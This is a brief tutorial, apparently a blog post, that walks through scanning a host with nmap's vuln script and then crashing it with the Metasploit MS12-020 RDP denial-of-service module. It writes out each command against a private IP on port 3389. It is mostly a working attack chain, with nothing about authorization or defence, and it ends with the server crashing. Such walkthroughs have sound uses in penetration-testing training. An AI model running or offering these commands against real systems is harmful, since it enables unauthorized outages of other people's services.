READY, SCAN, ATTACK!!!
First, we will find a target and ensure the host is up. We will do this by using Nmap:
#nmap -sn 192.168.71.156
Once we know the host is up and running, we will use Nmap to find any critical vulnerabilities. We invoke the command
#nmap --script vuln 192.168.71.156 --reason
With this command, Nmap will execute the NSE script called Vuln and scan the host for vulnerabilities. Once the scan completed, we can see the result and show the available vulnerability of the host. The result even provide us with the link to know more information of the vulnerability.
Now lets exploit that vulnerability! So first we need to locate whether the exploit is in the metasploit database. On your terminal, run
#locate ms12_020
The output shows that the exploit is available in metasploit.
Alternatively, you can also search the exploit in the MSFconsole itself by firing up #msfconsole and then run
#search ms12_020
Now that we know the exploit is available, we will now execute it.
msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.71.156
msf auxiliary(ms12_020_maxchannelids) > set RPORT 3389
msf auxiliary(ms12_020_maxchannelids) > run
Once executed, the server will crash!!! Note that this is a Layer 7 DOS attack!